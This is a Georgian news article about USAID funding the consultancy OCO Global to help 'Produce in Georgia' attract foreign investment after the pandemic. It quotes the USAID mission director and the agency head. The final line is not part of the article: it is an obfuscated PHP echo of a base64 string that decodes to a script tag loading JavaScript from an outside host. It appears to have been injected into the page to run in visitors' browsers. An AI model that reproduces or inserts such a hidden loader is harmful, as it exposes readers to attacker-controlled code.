celsiusi
ავერსი საქკაბელი
აშშ-ი საქართველოში პირდაპირი უცხოური ინვესტიციების მოზიდვას დააფინანსებს. ამის შესახებ ინფორმაციას ამერიკის საელჩო ავრცელებს.
 
"იმისათვის, რომ საქართველოს კერძო სექტორს COVID-19 პანდემიის შემდგომ აღდგენაში დავეხმაროთ, აშშ-ის მთავრობა დააფინანსებს უცხოური ინვესტიციების საკონსულტაციო ფირმა OCO Global-ს, რომელიც გამოავლენს და ხელს შეუწყობს მაღალანაზღაურებადი ინვესტიციების შესაძლებლობებს საქართველოს ეკონომიკაში. ასევე, შეუწყობს ხელს ქვეყნის საერთაშორისო ეკონომიკის პოტენციალის შესახებ მსხვილ საერთაშორისო ინვესტორებთან ცნობიერების ამაღლებას", - იტყობინება საელჩო.
 
დიპლომატიური უწყების ცნობით, აშშ-ის მთავრობა აღნიშნულ დაფინანსებას USAID-ის მეშვეობით გამოყოფს.
 
USAID-ის ფინანასური მხარდაჭერით კი, სააგენტოს „აწარმოე საქართველოში“ საინვესტიციო გუნდი მჭიდროდ ითანამშრომლებს პირდაპირი უცხოური ინვესტიციების საკონსულტაციო ფირმასთან OCO Global-თან, რაც ხელს შეუწყობს ქვეყნის ეკონომიკაში მაღალანაზღაურებადი ინვესტიციების მოზიდვას და საქართველოს ეკონომიკის პოტენციალთან დაკავშირებით საერთაშორისო ინვესტორთა ცნობიერების ამაღლებას. ინიციატივის პრიორიტეტი იქნება ინდუსტრიული და ექსპორტზე ორიენტირებული პროექტები, როგორიცაა ინოვაციური, მაღალხარისხიანი ელექტრონიკის, სამედიცინო ინსტრუმენტების, საავააციო და მანქანების ნაწილების წარმოება.
 
“ეს ახალი პარტნიორობა ხელს შეუწყობს საქართველოს ეკონომიკის აღდგენის დაჩქარებას, ინვესტიციების მოზიდვას ინოვაციურ მრეწველობაში, მაღალანაზღაურებადი სამუშაო ადგილების შექმნას და ქვეყნის კონკურენტულ, საერთაშორისო ბაზრებზე გასვლას”- ამბობს USAID/საქართველოს მისიის დირექტორი პიტერ ვიბლერი.
 
"პარტნიორობა ხელს შეუწყობს USAID-ის ახალი სტრატეგიის განხორციელების დაჩქარებას, რომელიც გულისხმობს კერძო სექტორის გაძლიერებას, რათა შეიქმნას მაღალანაზღაურებადი დასაქმების შესაძლებლობები და განვითარდეს ეკონომიკა, რომელიც სარგებელს მოუტანს საქართველოს ყველა მოქალაქეს. 
 
უცხოური ინვესტიციების საკონსულტაციო ფირმასთან OCO Global-თან მუშაობით გავზრდით ინვესტიციების მოზიდვის არეალს გლობალურ მასშტაბზე“ - ამბობს "აწარმოე საქართველოს" ხელმძღვანელი მიხეილ ხიდურელი.
1679
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");